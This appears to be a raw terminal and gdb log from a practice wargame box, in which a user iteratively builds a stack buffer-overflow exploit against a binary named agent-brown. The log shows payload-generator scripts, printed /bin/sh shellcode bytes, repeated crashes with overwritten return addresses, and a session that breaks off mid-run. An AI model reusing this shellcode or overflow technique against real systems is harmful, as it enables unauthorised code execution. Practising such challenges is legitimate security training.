There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) layout split
brown@pwnable:~$ ./egg > test
brown@pwnable:~$ invoke -d agent-brown test
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown test
TEST
[Inferior 1 (process 12456) exited normally]
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown test

Breakpoint 1, main (argc=2, argv=0xbffff724) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ ls
agent-brown  agent-brown.c  egg  exploit  README  test
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -e egg=$(./egg) agent-brown $(./arg)
-bash: ./arg: No such file or directory
brown@pwnable:~$ vim exploit
brown@pwnable:~$ ./exploit
./exploit: 2: ./exploit: ./arg: not found
brown@pwnable:~$ vim egg
brown@pwnable:~$ vi exploit
brown@pwnable:~$ ./egg
junkADDR
brown@pwnable:~$ vi exploit
brown@pwnable:~$ vi agent-brown.c
brown@pwnable:~$ vi arg
brown@pwnable:~$ vi arg
brown@pwnable:~$ vi egg
brown@pwnable:~$ chmod +x arg
brown@pwnable:~$ vi arg
brown@pwnable:~$ vi egg
brown@pwnable:~$ vi arg
brown@pwnable:~$ python arg
  File "arg", line 1
    !#/usr/bin/env python
    ^
SyntaxError: invalid syntax
brown@pwnable:~$ vi arg
brown@pwnable:~$ vi arg
brown@pwnable:~$ python arg
""""""""""""""""
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"

Breakpoint 1, main (argc=2, argv=0xbffff714) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ vi arg
brown@pwnable:~$ vi egg
brown@pwnable:~$ python egg
?^?1??F?F
         ?
          ???V
              ̀1ۉ?@̀?????/bin/sh
brown@pwnable:~$ python arg
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) layout split
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x68" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
???????????????\??????????p??????

Program received signal SIGSEGV, Segmentation fault.
0x0070bfff in ?? ()
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) layout split
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"

Breakpoint 1, main (argc=2, argv=0xbffff6a4) at agent-brown.c:32
32
(gdb) c
Continuing.
???????????????\??????????p??????

Program received signal SIGSEGV, Segmentation fault.
0x0070bfff in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 20089] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"

Breakpoint 1, main (argc=2, argv=0xbffff694) at agent-brown.c:32
32
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"

Breakpoint 1, main (argc=2, argv=0xbffff694) at agent-brown.c:32
32
(gdb) d
Delete all breakpoints? (y or n) y
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
???????????????\????\????

Program received signal SIGSEGV, Segmentation fault.
0x0064b7fd in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 20195] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
???????????????\????\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0xfaf00000 in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 20249] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
???u???????????\u???\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0x38b8b7fd in ?? ()
(gdb) :q
Undefined command: "".  Try "help".
(gdb) q
A debugging session is active.

	Inferior 1 [process 20284] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
???e???????????\e???\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0x00700000 in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 20334] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
???U???????????\U???\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0x0000b7fd in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 20372] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
???E???x???????\E???\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0xf568b7ff in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 20407] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
???5???h???????\5???\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0xf5580000 in ?? ()
(gdb)
(gdb) q
A debugging session is active.

	Inferior 1 [process 20475] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
???E???x???????\E???\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0xf568b7ff in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 20501] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
???%???X???x???\%???\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0x0202bfff in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 20554] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./egg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"
??????H???h???\???\x???????p???????

Program received signal SIGSEGV, Segmentation fault.
0x02020202 in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 20605] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ vim egg
brown@pwnable:~$ vim egg
brown@pwnable:~$ ls
agent-brown  agent-brown.c  arg  egg  exploit  README  test
brown@pwnable:~$ vi exploit
brown@pwnable:~$ cp arg arg1
brown@pwnable:~$ cp egg arg
brown@pwnable:~$ vi arg
brown@pwnable:~$ cp arg1 egg
brown@pwnable:~$ vi egg
brown@pwnable:~$ rm arg1
brown@pwnable:~$ ls
agent-brown  agent-brown.c  arg  egg  exploit  README  test
brown@pwnable:~$ vi arg
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
  File "./arg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown
[Inferior 1 (process 20798) exited with code 01]
(gdb) q
brown@pwnable:~$ ./exploit
  File "./arg", line 7
    "\x22\x22\x22\x22\x22\x22\x22\x88" +)
                                        ^
SyntaxError: invalid syntax
brown@pwnable:~$ vi arg
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown ?\^?1??F?F
                                                    ?
                                                     ???V
                                                         ̀1ۉ?@̀?????/bin/sh\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"?
Check out the hint.
??~?V(?f'?f,?+?ӭn(?v,?????`???????BINSH?????????(???\????\8???@???p???@???
[Inferior 1 (process 20859) exited normally]
(gdb) q
brown@pwnable:~$ vi arg
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown ?\^?1??F?F
                                                    ?
                                                     ???V
                                                         ̀1ۉ?@̀?????/bin/sh\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"?
??~?V(?f'?f,?+?ӭn(?v,?????`???????BINSH?H??????H???h???\???\x???????p???????
[Inferior 1 (process 20901) exited normally]
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown ?\^?1??F?F
                                                    ?
                                                     ???V
